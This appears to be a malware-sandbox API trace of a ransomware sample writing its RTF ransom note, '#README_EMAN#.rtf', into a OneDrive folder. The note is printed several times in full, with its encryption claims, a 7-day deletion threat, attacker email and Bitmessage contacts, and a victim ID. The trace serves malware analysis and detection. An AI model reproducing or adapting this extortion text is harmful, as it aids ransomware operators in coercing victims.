th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nEwJVUzEVMBMGA1UEChMMRGl\x93/", lpUsedDefaultChar=0x0) returned 8717 [0298.804] WriteFile (in: hFile=0x27c, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.805] CloseHandle (hObject=0x27c) returned 1 [0298.805] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gd-latn\\#readme_eman#.rtf")) returned 0xffffffff [0298.805] GetLastError () returned 0x2 [0298.805] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gd-latn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.806] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.806] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.806] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 